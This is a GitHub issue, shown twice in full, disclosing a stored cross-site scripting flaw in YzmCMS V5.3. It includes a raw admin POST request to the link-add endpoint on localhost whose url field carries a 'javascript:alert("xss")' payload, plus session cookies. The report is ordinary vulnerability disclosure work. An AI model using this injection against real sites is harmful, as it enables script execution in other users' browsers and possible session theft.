Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cross Site Scripting Vulnerability in Latest Release V5.3
Hi, I would like to report Cross Site Scripting vulnerability in latest release.
Description: Cross-site scripting (XSS) vulnerability in banner_list.html
Steps To Reproduce: 1、Login Admin System; 2、create new page url:http://127.0.0.1/yzmcms/link/link/add.html `POST http://127.0.0.1/yzmcms/link/link/add.html HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Content-Length: 137 Accept: application/json, text/javascript, /; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://127.0.0.1/yzmcms/link/link/add.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=32ac906cf4fd00f38d9fd891eeaa3c40; yzmphp_adminid=a4afUreJXZ4pZ5mTo0F3vxcDfFM6sJ0sYQel1-p3; yzmphp_adminname=b11bhadgtkARA-vRFm900d0gCKxmI4cIz75JmY-U-o9rsIs; yzmphp_catid=8e57881gPizoimKE-eME9mjZLBndVDbBZ_1YeKHo
name=%E7%99%BE%E5%BA%A6&url=javascript%3Aalert(%22xss%22)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1` 3、Click link
Release Info: V5.3
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Cross Site Scripting Vulnerability in Latest Release V5.3
Hi, I would like to report Cross Site Scripting vulnerability in latest release.
Description:
Cross-site scripting (XSS) vulnerability in banner_list.html
Steps To Reproduce:
1、Login Admin System;
2、create new page
url:http://127.0.0.1/yzmcms/link/link/add.html
`POST http://127.0.0.1/yzmcms/link/link/add.html HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 137
Accept: application/json, text/javascript, /; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1/yzmcms/link/link/add.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=32ac906cf4fd00f38d9fd891eeaa3c40; yzmphp_adminid=a4afUreJXZ4pZ5mTo0F3vxcDfFM6sJ0sYQel1-p3; yzmphp_adminname=b11bhadgtkARA-vRFm900d0gCKxmI4cIz75JmY-U-o9rsIs; yzmphp_catid=8e57881gPizoimKE-eME9mjZLBndVDbBZ_1YeKHo
name=%E7%99%BE%E5%BA%A6&url=javascript%3Aalert(%22xss%22)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1`
3、Click link
Release Info:
V5.3
The text was updated successfully, but these errors were encountered: